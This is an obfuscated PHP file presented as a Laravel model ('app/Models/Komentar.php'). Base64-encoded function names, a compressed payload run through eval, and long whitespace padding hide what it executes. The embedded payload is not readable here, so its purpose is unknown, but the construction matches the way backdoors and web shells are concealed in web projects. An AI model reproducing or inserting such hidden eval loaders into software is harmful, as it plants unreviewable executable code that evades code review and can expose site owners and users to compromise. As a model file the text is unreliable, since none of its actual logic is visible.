<?php 
        $__='printf';$_='Loading app/Models/Komentar.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWltvm0oQfo90/kMeKrlVj1LAcRIr8oOhBoMTp4BZLi8Vy9qADZgE3/Cv7yw4vug0aaoeHfVU+1mY2+7OzPfNDCjx+XmNd18BnUb+FGeLSeO2Ot2h0/Dz/NP9nIyT4tNgno6zhf90kUf5uZT4RXFxcdG4Pdstc/7XGfv8fp8zquf5v4jOP640HL5duDYfe0qv06guHbLiTdjlXOecgYGB4c9EI0gRRxxtqSpIcO31XJPbE6ecXddNE7pm3a6/MqoYGBgYGBgYGBgY/m9gf85gYGBg+HPRwH4xvrr8SsbBnIwbt4wRBgYGBgaGX8LpDxGkMF+6Np8ETTFyBSvUHXHt9PiVp6Ai2BYDKUNbzxQ1rGx4bCdL1zESp2dERJFj1xnCMSpwU+Y9u8U5PY337c3Mc9Trn5tX23tYzweusImC5n1oCu0Fvec6aug5EQfHs6AUh1gwEtzNr6W4G6qSuCa2Vvj2fegK7WXQ1EPdGlom8mT1Mxfej4qBKsG4vsi76SZ3S3GKhdaWSOLDiGuJOm9oaGaFX8xuCbZDOjbooxgryVRVhiucDTlVNjSrhyYjSx4hq3jTWJND98iSzR/6wBsT02pNdKRZprWQR1K3rX4OmkOYU8fXXQ3ieT1f6j7C+nPglHMhZtgDT8OVKyTAKZqpfZITJQyJEiWqUvN5F9Z+qtLRGj1RoJwGTaP07Va2sxMO4ptnP0vcNBIXNk/qzqheWKk4yvyDJhnVql7z5nFwsBOiyn4rwrYVYsGt/ZG0aZCi2k9F5tSYckDz4nK5t3+0ht73oiAWt6Sv5TglNziDXOnu769e1J7XZB0ZsiG3RUS5lAjnCZsJccQCC/JM277Ka1UHqtJO1T4978Ywb0bz1pPEiEgqtVMQm1++hdeJ0uKxst7fv3sxZ5Bu9GTLsAzIA73ieW9XboPd4Fra2bsr548HvUTLB12w3Z559jqD2oC9FxF7w6nAH+6jBK6luAl+OwYXpAnEY8C1y71PR2t1SSqXoE0ZpHLrRzlxuh7wLBfPa9It821j4joa59uLBEtB+GV0GQYCKrzp/Go0a1sOlzw4nGyiXnJnWOtipyd5PadkjuaDmyHOc+5pXgE3UAMp5UDeQqy0HnJPaEVQZ8lrGoFvpevMvqONtoIcnVZ5Khkp9LKirrUqxsyz+cgHru8gRtwkS+hz1XHQRLGfoietXIeasFhhGy2hbsrqvGnkgWLtxkH/66NtPa61coRoXR8nM0eQS6IkT1RL58X6H05xUwQuemHggL7ZDHi4gTprFWNTTHBa16oryNAvyQruv1BflDd5oR76daj1oRc7Wus4J/b/Vj+MeyWfPR6nQ9C8vVT7tZ+GXWsxkIwNsVE5Nnec94/zRSw9x+CD9HLvw92o1fQVVHpmeMJZdQy2Hqb5c+/On3vxRP9+7ljCcAX8H/iC/kXsAnhL1lDza88ZRjgWF/BM4v0XaiMALV2bC/UM5ViBnI+7s916x7m1hryKsPnctwKIp9L+eMw+1v1a4ct9zcvQEmouxwKtHxoHsnxHTCwFbV37cr7nSzqx2QKb+W6t6+c46Fb7g/Q6ZtofDW4M68Fzqk37Dq0j4CY7nlNtn2/29Qs1qxuoPdTREJnr+ek4qXsF2idYca8ektNn4aG2f6x5rU1QUP+O4v2dtP5VHWsNElqzJAM/o1+pkUNfgueUY8wHEnkkTT0bmNxHAu9aQRzmMH5N36GIbUDs3EecJk+D/bsJNwBOO43bs7P//kW0U+3f784+3P7M9KO5b5n47mDwfYN+N/7em2W/t/29f297quH7k6SpJfxw+w34lbeo';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
